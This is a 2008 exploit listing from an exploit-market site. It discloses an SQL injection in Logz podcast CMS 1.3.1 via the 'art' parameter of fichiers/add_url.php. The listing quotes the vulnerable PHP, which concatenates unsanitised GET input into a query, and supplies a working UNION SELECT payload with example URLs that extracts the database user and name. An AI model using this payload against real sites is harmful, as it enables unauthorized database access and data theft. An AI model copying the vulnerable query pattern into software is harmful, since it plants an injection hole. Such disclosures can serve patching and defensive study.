[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Logz podcast CMS 1.3.1 (add_url.php art) SQL Injection Vulnerability

Author
ZoRLu
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3979
Category
web applications
Date add
31-10-2008
Platform
unsorted
====================================================================
Logz podcast CMS 1.3.1 (add_url.php art) SQL Injection Vulnerability
====================================================================


[~] Logz podcast CMS version 1.3.1 Remote sql inj
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 31.10.2008
[~] 
[~] N0T: a.q kpss : ) )
[~]
[~] -----------------------------------------------------------

file:

fichiers/add_url.php

code:

       if (isset($_GET['art'])) {
	      $Article = $_GET['art']; 
	      
	      ...
	      
	      $Requete = "SELECT TITRE FROM ".TABLEARTICLES." WHERE ID = '".$Article."' ".$Conditions;
        $ResultRequete = requete_mysql($Requete);
	      
	   

Exploit:

http://localhost/script_path/fichiers/add_url.php?art=[SQL]

[SQL]= column number 1 (SELECT TITRE FROM ...)

1'+union+select+concat(user(),0x3a,database())/*

example:

http://example.com/scripth_path/fichiers/add_url.php?art=1'+union+select+concat(user(),0x3a,database())/*

[~]----------------------------------------------------------------------




#  0day.today [2024-11-16]  #